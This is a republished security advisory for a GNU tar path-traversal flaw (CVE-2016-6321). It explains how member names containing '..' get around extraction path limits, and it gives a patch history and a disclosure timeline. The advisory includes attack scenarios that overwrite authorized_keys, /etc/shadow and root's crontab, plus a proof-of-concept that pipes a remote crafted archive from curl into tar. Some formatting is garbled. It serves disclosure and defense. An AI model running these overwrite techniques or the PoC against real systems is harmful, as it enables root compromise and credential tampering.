GNU tar(POINTYFEATHER) decompression path bypass vulnerability

2016-11-07T00:00:00
ID SSV:92524
Type seebug
Reporter Root
Modified 2016-11-07T00:00:00

Description

Vulnerability analysis reference: http://paper.seebug.org/103/

Overview

GNU `tar' archiver can be tricked into extracting files and directories in the given destination, regardless of the path name(s) specified on the command line.

Description

GNU `tar' archiver attempts to avoid path traversal attacks by removing offending parts of the element name at the extract. This sanitizing leads to a vulnerability where the attacker can bypass the path name(s) specified on the command line.

Impact

The attacker can create a crafted tar archive that, if extracted by the victim, replaces files and directories the victim has access to in the target directory, regardless of of the path name(s) specified on the command line.

Details

The discovered vulnerability, described in more detail below, enables file and directory overwrite attacks against the user or system by using a crafted tar archive. The attack requires that the victim or the system extract the crafted tar archive prepared by the attacker. Automated systems extracting paths from archives originating from untrusted sources are in particular danger, especially if the extract operation is performed with elevated privileges.

In the worst-case scenario this vulnerability can lead to a full system compromise (remote code execution as root).

  1. Extract the pathname bypass due to safer_name_suffix usage

lib/paxnames. c safer_name_suffix() function sanitizes the file_name' parameter and removes the file system prefix from the name ifabsolute_names' parameter is 0. As a result, the path name effectively becomes relative to the target directory, ignoring the the path name given on the command line.

The history of this bug is somewhat complicated:

  • Before 13.12.1999 commit it was possible to extract entries with member names containing ".." sequence(s).
  • On 13.12.1999 commit the code was changed[1] to warn about and skip the member names that had the ".." sequence(s): `(extract_archive): By default, warn about ".." in member names, and skip them.'
  • However on 05.07.2003 the code was changed[2] to use safer_name_suffix' function:(extract_archive): Use safer_name_suffix rather than rolling our own.'

The unfortunate side effect of the 05.07.2003 change was that rather than skipping the entries with malicious member names with ".." in them, the code would now attempt to make the malicious name safe. Making the name safe involves stripping all offending path components, thus resulting in the target name being relative to the target directory root, regardless of the requested path name.

Here is a number of practical attack scenarios:

  • Attack the user by replacing important files, such as . ssh/authorized_keys, . bashrc, the . bash_logout, . profile, . subversion or . anyconnect, when they extract an tar archive. For example: user@host:~$ dpkg --fsys-tarfile evil. deb | tar-xf - \ --wildcards 'blurf*' tar: Removing leadingblurf/../' from member names user@host:~$ cat . ssh/authorized_keys ssh-rsa AAAAB3...nU= mrrobot@fsociety user@host:~$`

  • Attack automation that extracts the tar originating from a web application or similar sources. Such operation might be performed by a setuid root component of the application. The command executed could be for example: #tar-C / -zxf /tmp/tmp. tgz etc/application var/chroot/application/etc The attacker can overwrite the /var/spool/cron/crontabs/root to gain code execution as root. It is also possible to replace binaries commonly executed by root with a backdoored ones, or to drop setuid root binaries that will enable the attacker to gain root privileges at will. Common attack would be to replace some of the network facing daemon with a backdoored one, enabling covert code execution on demand.

This type of scenario has been successfully exploited in the real world to gain a remote code execution as root in different environments.

  • Attack commands that try to replace single files/dirs as root:

The victim would like to replace /etc/motd' file in the system by extracting it from an archive obtained from an untrusted source: `` # tar-C / -xvf archive. tar etc/motd tar: Removing leadingetc/motd/../' from member names etc/motd/../etc/shadow # The attacker can also bypass --exclude rule, if it is being used with --anchored switch. For example: The victim would like to extract all files but/etc/shadow' from an archive:# tar-C / -xvf archive. tar --anchored --exclude etc/shadow tar: Removing leading/etc / motd/../' from member names etc/motd/../etc/shadow # `` In both cases, the attacker has now successfully replaced /etc/shadow file with arbitrary content.

Exploiting the vulnerability works best if the attacker has some prior knowledge of the specifics of the tar command line that gets executed. The path prefix before the `..' sequence will need to (at least partially) match the target path (or not match in case of the exclude rule) in order for the bypass attack to work. Guessing which paths the victim might extract could work too, but the success rate is likely lower.

Vulnerable versions

  • GNU tar 1.14 to 1.29 (inclusive)

Affected operating systems

Red Hat Alpine Linux Red Star OS ... any other Linux using GNU tar

Recommended changes to GNU tar

  1. Skip entries with member names containing a '..', or fail the whole the tar extract operation.

The following patch by the GNU tar project implements the fix: http://git.savannah.gnu.org/cgit/tar.git/commit/?id=7340f67b9860ea0531c1450e5aa261c50f67165d

Alternatively the following patch by the advisory author could be used: https://sintonen. fi/advisories/tar-extract-pathname-bypass. patch

Proof-of-concept

$ curl https://sintonen.fi/advisories/tar-poc.tar | tar xv etc/motd $ cat etc/shadow

References

[1] http://git.savannah.gnu.org/cgit/tar.git/commit/src/ extract. c? id=6e9d1539b665c8f3c173b36702ca1650cac977ad [2] http://git.savannah.gnu.org/cgit/tar.git/commit/src/ extract. c? id=675c5a2f243bb5e72c982c0e3c30762ec32e9a1b

Timeline

10.03.2016 discovered the vulnerability 11.03.2016 wrote a preliminary advisory 11.03.2016 contacted the GNU tar maintainer for a PGP key 14.03.2016 revised the advisory with --anchored --exclude bypass information 15.03.2016 reworked the advisory slightly 15.03.2016 sent the advisory to the GNU tar maintainer 16.03.2016 contacted secalert@redhat.com for help in coordination 17.03.2016 added end user mitigation via the --one-top-level to the advisory 17.03.2016 the GNU tar maintainer didn't consider this to be an issue. as a result mitigation in upstream GNU tar appears unlikely 23.03.2016 added more attack scenarios to the advisory 10.08.2016 reworked the advisory slightly 10.08.2016 polled secalert@redhat.com regarding the status of the coordination 11.08.2016 CVE-2016-6321 was assigned to the vulnerability 15.09.2016 polled secalert@redhat.com regarding the status of the coordination 26.10.2016 handcrafted the ascii release file at a lobby bar 27.10.2016 public release of the advisory at t2'16 30.10.2016 fixed the patch to use FATAL_ERROR. ref: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842339#12 31.10.2016 added link to a patch by GNU tar project

                                        
                                            
                                                $ curl https://sintonen.fi/advisories/tar-poc.tar | tar xv etc/motd
$ cat etc/shadow